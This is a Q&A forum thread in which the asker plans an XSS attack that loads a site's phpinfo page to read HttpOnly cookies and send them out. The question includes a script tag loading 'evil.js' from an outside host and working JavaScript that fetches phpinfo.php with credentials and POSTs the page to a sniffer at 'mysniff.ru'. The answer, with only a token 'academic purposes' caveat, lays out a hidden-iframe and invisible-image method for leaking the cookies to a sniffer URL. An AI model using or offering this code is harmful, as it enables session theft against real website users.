# Using phpinfo() to get httponly cookies?

Tags: php, xss, cookies

`phpinfo()` shows all cookies, even the httponly ones. So the question is - how can I receive a user's cookies on a target website through XSS with phpinfo? The XSS will contain code that will open the phpinfo page in the background (like a popunder) and then using XMLHttpRequest will send the page content to my web sniffer page. The question is - I don't really know how to put this together. I'm seeing in this way:

1. XSS will contain `<script src="http://mywebsite.com/evil.js"></script>`
2. evil.js will open XMLHttpRequest GET to get phpinfo page with cookies data
3. evil.js will post data to my sniffer

Is this the correct way to do this or is there maybe a more appropriate approach?

I wrote up an example of what I was thinking of:

```
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange= function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {

        var body = encodeURIComponent(xhttp.responseText);
        xhttp.open("POST", 'http://mysniff.ru/t.php', true)
        xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
        xhttp.send(body)

    }
};

xhttp.open("GET", "phpinfo.php", true);
xhttp.withCredentials = true;
xhttp.send();
```

Will it work if I include this code as a script src? Or must I only urlencode it and pass it to a vulnerable parameter in order to work?

Comment: Are you saying if phpinfo is already on the box? If not, that would be the hard part.

Comment: @Peleus, yes, phpinfo is there. But not sure how to use this technique altogether. Maybe there is some appropriate way?

Answer (score 4):

First of all, I assume that you are the owner of the website disclosing the phpinfo, and you ask this for academic purposes.

To achieve what you said, I would do the following :

- Create an invisible iframe (0px x 0px)
- Store `cookies` in `var x` by parsing the iframe content through `contentDocument` getter/setter
- Create an invisible `<img/>` (0px x 0px) with `src` set to your sniffer URL
- Concat `x` to the querystring in the src attribute
- Add your `<img/>` to the `<body>`
- (At this point, the browser will try to load the `<img/>` even if its not a picture)
- Read server `GET` logs on your sniffer

**Edit**: I did not see that this thread was a 4 years old one ...